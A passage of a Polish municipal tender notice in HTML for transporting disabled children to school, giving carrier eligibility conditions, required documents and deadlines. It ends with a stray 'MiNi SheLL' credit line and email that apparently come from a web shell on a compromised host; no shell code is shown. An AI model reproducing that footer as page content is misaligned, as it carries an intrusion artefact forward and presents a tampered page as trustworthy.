zawodowej, o ile wynika to z odrębnych przepisów<br/>Zamawiający uzna, że Wykonawca spełni warunek z zakresie uprawnień do prowadzenia określonej działalności<br/>gospodarczej lub zawodowej, jeśli dysponuje ważną licencją na wykonanie krajowego transportu drogowego osób lub<br/>obowiązującym zezwoleniem na wykonanie zawodu przewoźnika drogowego zgodnie z ustawą z dnia 6 września 2001 r. o<br/>transporcie drogowym (t.j. Dz.U. z 2024 r. poz. 728 z późn. zm.).<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający uzna, że Wykonawca spełnia warunek w zakresie sytuacji ekonomicznej lub finansowej, jeżeli Wykonawca<br/>wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem<br/>zamówienia na kwotę 200 tys. zł.<br/>4) zdolności technicznej lub zawodowej:<br/>a) Zdolność techniczna:<br/>Warunek zostanie spełniony, jeśli Wykonawca wykaże, iż na czas realizacji zamówie-nia będzie dysponował co najmniej<br/>jednym pojazdem (umożliwiającego realizację określonego zadania) do przewozu osób niepełnosprawnych na wózkach<br/>inwalidzkich na dowóz na zajęcia szkolne oraz na odwóz po zajęciach szkolnych. Pojazd ma speł-niać następujące wymogi:<br/>posiadać niezbędne badania techniczne,<br/>nie może być starszy niż 10 lat,<br/>posiadać ubezpieczenie komunikacyjne od odpowiedzialności cywilnej (OC)<br/>oraz od następstw nieszczęśliwych wypadków (NW w kwocie min. 35 tys. zł).<br/>wszystkie fotele w pojeździe wyposażone są w pasy bezpieczeństwa,<br/>pojazd powinien posiadać sprawną klimatyzację.<br/>b) Zdolność zawodowa:<br/>Warunek zostanie spełniony, jeśli Wykonawca wykaże, że:<br/>- w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy,<br/>to w tym okresie, wykonał co najmniej jedną usługę odpowiadającą swoim zakresem przedmiotowi zamówienia tzn.<br/>wykonał, co najmniej jedną usługę dotyczącą przewozu dzieci niepełnosprawnych do szkół, przedszkoli i ośrodków,<br/>- dysponuje lub będzie dysponował osobami zdolnymi do wykonania zamówienia, które zostaną skierowane do jego<br/>realizacji, tj. co najmniej 1 osobą, posiadającą uprawnienia do kierowania pojazdami o liczbie miejsc siedzących zgodnej z<br/>wymaganiami dla zadania nr 2, łącznie z opiekunem i kierowcą (prawo jazdy kat. D, posiada doświadczenie w kierowaniu<br/>pojazdem min. 5 lat, posiada ważne na dzień składania dokumentów badania przeprowadzone przez lekarza uprawnionego<br/>do badania osób kierujących pojazdami oraz psychologa uprawnionego do badań psychologicznych i psychotechnicznych, a<br/>także aktualne przeszkolenie w zakresie bhp i ppoż). Wykonawca zobowiązany jest, podczas całego okresu realizacji<br/>umowy, zapewnić opiekę osoby dorosłej przewożonym dzieciom (opiekuna – niezależnie od kierowcy) – co najmniej jedna<br/>osoba do zadania nr 2 – osoba ta musi posiadać zaświadczenie o przeszkoleniu w zakresie udzielania pierwszej pomocy<br/>medycznej lub pierwszej pomocy przedmedycznej, zaświadczenie o odbytym szkoleniu BHP i Ppoż. oraz zaświadczenie o<br/>niekaralności (KRK).<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>• warunek określony w rozdziale IX ust. 2 pkt 4) lit. b) tiret pierwszy musi być spełniony w całości min. przez jednego z<br/>Wykonawców,<br/>• warunek określony w rozdziale IX ust. 2 pkt 4) lit. b) tiret drugi może być spełniony łącznie przez Wykonawców<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, do<br/>realizacji których te zdolności są wymagane. Oświadczenie, z którego wynikać będzie, które usługi wykonają poszczególni<br/>Wykonawcy składane będzie w pkt. 14 Formularza Oferty.<br/>Oceniając zdolność techniczną lub zawodową, Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca<br/>nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności<br/>zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy<br/>może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) oświadczenie wykonawcy,<br/>w zakresie art. 108 ust. 1 pkt 5 p.z.p., o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego<br/>2007 r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2024 r. poz. 594), z innym wykonawcą, który złożył odrębną ofertę, ofertę<br/>częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy<br/>kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o<br/>dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej - załącznik<br/>nr 7 do SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Aktualną<br/>licencję na wykonanie krajowego transportu drogowego osób lub obowiązującym zezwoleniem na wykonanie zawodu przewoźnika<br/>drogowego zgodnie z ustawą z dnia 6 września 2001 r. o transporcie drogowym (t.j. Dz.U. z 2024 r. poz. 728 z późn. zm.).<br/>2) Wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich<br/>3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, porównywalnych usługami stanowiącymi przedmiot<br/>zamówienia, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi te zostały wykonane lub<br/>są wykonywane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały<br/>wykonywane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń<br/>powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonanie<br/>powinny być wystawione w okresie 3 miesięcy (załącznik nr 3 do SWZ);<br/>3) Wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o<br/>podstawie do dysponowania tymi osobami (załącznik nr 4 do SWZ);<br/>4) Wykaz środków transportu, którymi dysponuje lub będzie dysponował Wykonawca, przeznaczonych do wykonania przedmiotu<br/>zamówienia wraz z informacją o podstawie dysponowania tymi pojazdami, na formularzu stanowiącym (załącznik nr 6 do SWZ);<br/>5) Dokumenty potwierdzające, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną wskazaną przez Zamawiającego tj. 200 tys. zł.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia publicznego. Stosowne pełnomocnictwo należy załączyć do oferty, a treść<br/>pełnomocnictwa powinna dokładnie określać zakres umocowania. 2. W przypadku Wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia, oświadczenie, o spełnieniu warunków udziału w postępowaniu oraz brak podstaw wykluczenia<br/>składa każdy z Wykonawców. 3. Wszelka korespondencja oraz rozliczenia będą dokonywane z podmiotem występującym<br/>jako pełnomocnik pozostałych. Oferta powinna być podpisana w taki sposób, by prawnie zobowiązywała wszystkie podmioty<br/>występujące wspólnie. Wykonawcy wspólnie ubiegający się o zamówienie ponoszą solidarną odpowiedzialność za<br/>wykonanie umowy. 4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia w treści formularza ofertowego (ust.<br/>14) składają oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach określonych<br/>we Wzorze Umowy, stanowiącym Załącznik nr 5 do SWZ. Zakres świadczenia Wykonawcy wynikający z umowy jest<br/>tożsamy z jego zobowiązaniem zawartym w ofercie. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności,<br/>zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-10-07 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy umieścić na platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/gmina_sobotka w myśl Ustawy na stronie internetowej prowadzonego postępowania</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-10-07 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com